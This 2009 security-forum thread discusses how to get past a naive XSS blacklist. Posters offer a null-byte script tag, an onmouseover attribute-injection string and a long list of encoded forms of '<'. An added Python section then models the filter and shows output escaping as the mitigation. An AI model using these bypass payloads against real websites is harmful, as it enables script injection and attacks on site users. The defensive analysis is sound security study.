Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Filter bypass question
Posted by: yogurtearl
Date: January 29, 2009 06:11PM

So I ran into a filter that filters open angle followed by a letter, i.e. regexp ".*<[a-zA-Z].*", but doesn't encode anything.

The output is in a <span>.

Can anyone think of a filter bypass? It seems like there has to be a bypass for such a simple filter.

Re: Filter bypass question
Posted by: backbone
Date: January 29, 2009 07:56PM

<%00script>alert(1)</script>

---
blog [-] microblog

Re: Filter bypass question
Posted by: yogurtearl
Date: February 02, 2009 03:24PM

The filter also caught that. It looks like they are also filtering < followed by a nonprintable or /. Things allowed after a <:

space
tab
newline
1-9
@#$%^&*()_-+=~`"':;?>.<,

Re: Filter bypass question
Posted by: lightos
Date: February 02, 2009 04:05PM

If it's an XSS you want to achieve, " onmouseover="alert(0); should work
If you're just curious about bypassing the filter, I would try different encodings/character combinations.
From ha.ckers XSS cheat sheet:
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

Like it says, "Most of these won't render out of the box, but many of them can get rendered in certain circumstances", so it's worth a try.

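As an added illustration (not code from the thread or from any of the posters), here is a Python model of the blacklist as the first two posts describe it, next to the output encoding that would have made the blacklist unnecessary. The two regexes, the `render_span_*` helpers and the sample strings are assumptions constructed for this example; the samples are the strings that appear in the thread plus one entity-encoded form from the cheat-sheet list. It shows why the blacklist passes the attribute-injection string and the entity-encoded `<`, why decoding before matching catches the entity forms, and that `html.escape` neutralises every sample whatever the output context.

```python
import html
import re
from typing import Dict, Optional

# Model of the blacklist the original poster described: reject any "<"
# followed by a letter (the regexp ".*<[a-zA-Z].*").
FIRST_FILTER = re.compile(r"<[a-zA-Z]")

# Model of the refined behaviour reported in the follow-up: "<" followed by a
# letter, a "/" or a non-printable character is also rejected, while space,
# tab and newline after "<" are still allowed. This is an assumption built
# from the posts, not the real filter's source.
REFINED_FILTER = re.compile(r"<(?:[a-zA-Z/]|[\x00-\x08\x0b\x0c\x0e-\x1f\x7f])")


def blacklist_rejects(value: str, refined: bool = True) -> bool:
    """True when the modelled blacklist would refuse the input outright."""
    pattern = REFINED_FILTER if refined else FIRST_FILTER
    return pattern.search(value) is not None


def decoded_rejects(value: str, refined: bool = True) -> bool:
    """Canonicalise (decode HTML entities) before matching, so that the
    entity-encoded forms of "<" from the cheat-sheet list are seen as "<"."""
    return blacklist_rejects(html.unescape(value), refined)


def render_span_blacklist(value: str, refined: bool = True) -> Optional[str]:
    """The pattern the thread describes: blacklist check, then raw
    interpolation into a <span> with no output encoding at all.
    Returns None when the blacklist rejects the input."""
    if blacklist_rejects(value, refined):
        return None
    return f"<span>{value}</span>"


def render_span_escaped(value: str) -> str:
    """The mitigation: HTML-escape on output. With quote=True the double and
    single quotes are encoded too, so the same call is safe whether the value
    lands in a text node or inside a quoted attribute."""
    return f"<span>{html.escape(value, quote=True)}</span>"


# Constructed samples: the strings that appear in the thread plus one
# entity-encoded form taken from the cheat-sheet list.
SAMPLES: Dict[str, str] = {
    "plain_tag": "<script>alert(1)</script>",
    "nul_after_angle": "<\x00script>alert(1)</script>",
    "attribute_break": '" onmouseover="alert(0);',
    "entity_encoded": "&#60;script&#62;alert(1)&#60;/script&#62;",
}


def audit(refined: bool = True) -> Dict[str, Dict[str, object]]:
    """For each sample: does the blacklist stop it, does decode-then-match
    stop it, what the raw renderer emits, and what the escaped renderer emits."""
    report: Dict[str, Dict[str, object]] = {}
    for name, value in SAMPLES.items():
        report[name] = {
            "blacklist_rejects": blacklist_rejects(value, refined),
            "decoded_rejects": decoded_rejects(value, refined),
            "raw_render": render_span_blacklist(value, refined),
            "escaped_render": render_span_escaped(value),
        }
    return report


if __name__ == "__main__":
    for name, row in audit().items():
        print(name)
        for key, val in row.items():
            print(f"  {key}: {val!r}")
```

Running the audit shows the shape of the problem: both versions of the blacklist reject the tag forms, but neither looks at the quote character, so the attribute-injection string reaches the page untouched, and the entity-encoded `<` is never matched because the filter only knows the raw byte. Decoding before matching closes the entity gap, but it still leaves the filter guessing about output context; encoding on output removes the guesswork, which is why the escaped renderer is the one to keep.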